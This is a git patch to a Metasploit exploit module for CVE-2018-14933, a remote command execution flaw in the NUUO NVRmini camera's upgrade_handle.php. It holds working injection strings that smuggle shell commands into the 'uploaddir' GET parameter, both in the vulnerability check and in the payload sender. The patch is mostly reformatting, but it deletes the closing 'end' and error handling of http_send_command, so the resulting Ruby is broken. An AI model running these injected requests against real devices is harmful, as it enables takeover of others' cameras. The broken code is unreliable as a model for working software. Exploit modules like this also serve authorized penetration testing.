From c72065987b6442c99061eb92c3a3cf6626ac0b0c Mon Sep 17 00:00:00 2001
From: Berk Dusunur <32654010+berkdsnr@users.noreply.github.com>
Date: Thu, 6 Dec 2018 06:19:16 +0300
Subject: [PATCH] Update nuuo_nvrmini_upgrade_rce.rb

---
 .../multi/http/nuuo_nvrmini_upgrade_rce.rb    | 36 +++++++++----------
 1 file changed, 17 insertions(+), 19 deletions(-)

diff --git a/modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb b/modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb
index 13522295fe..e5c1fd2ada 100644
--- a/modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb
+++ b/modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb
@@ -10,28 +10,28 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => 'NUUO NVRmini - upgrade_handle.php Remote Command Execution',
-      'Description'    => %q{
+      'Name'        => 'NUUO NVRmini - upgrade_handle.php Remote Command Execution',
+      'Description' => %q{
         NUUO NVRmini  ip camera web application. The upgrade_handle.php file is affected by the remote command execution vulnerability.
       },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
+      'License' => MSF_LICENSE,
+      'Author'  =>
         [
           'Berk Dusunur <@berkdusunur>', 
           'numan turle <@numanturle>'
         ],
-      'References'     =>
+      'References' =>
         [
           ['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
           ['CVE', '2018-14933'],
           ['EDB', '45070']
         ],
-      'Privileged'     => false,
-      'Payload'        =>
+      'Privileged'   => false,
+      'Payload'      =>
         {
           'DisableNops' => true
         },
-      'Platform'       => %w{ unix win },
+      'Platform'       => %w{ unix win linux },
       'Arch'           => ARCH_CMD,
       'Targets'        => [ ['NUUO NVRmini', { }], ],
       'DisclosureDate' => 'Aug 04 2018',
@@ -41,13 +41,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = send_request_cgi({
-      'uri'     => normalize_uri(target_uri.path.to_s, "upgrade_handle.php"),
-      'vars_get'        =>
+      'uri' => normalize_uri(target_uri.path.to_s, "upgrade_handle.php"),
+      'vars_get' =>
         {
           'cmd' => 'writeuploaddir',
           'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
         }
     })
+  unless res
+    vprint_error 'Connection failed'
+  return CheckCode::Unknown
+    end
     if res.code == 200 and res.body =~ /upload_tmp_dir/
       return Exploit::CheckCode::Vulnerable
     end
@@ -57,20 +61,14 @@ class MetasploitModule < Msf::Exploit::Remote
   def http_send_command(cmd)
     uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
     res = send_request_cgi({
-      'method'          => 'GET',
-      'uri'             =>  uri,
-      'vars_get'        =>
+      'method'   => 'GET',
+      'uri'      =>  uri,
+      'vars_get' =>
         {
           'cmd' => 'writeuploaddir',
           'uploaddir' => "';"+cmd+";'"
         }
     })
-    unless res
-      fail_with(Failure::Unknown, 'Failed to execute the command.')
-    end
-    res
-  end
-
   def exploit
     http_send_command(payload.encoded)
   end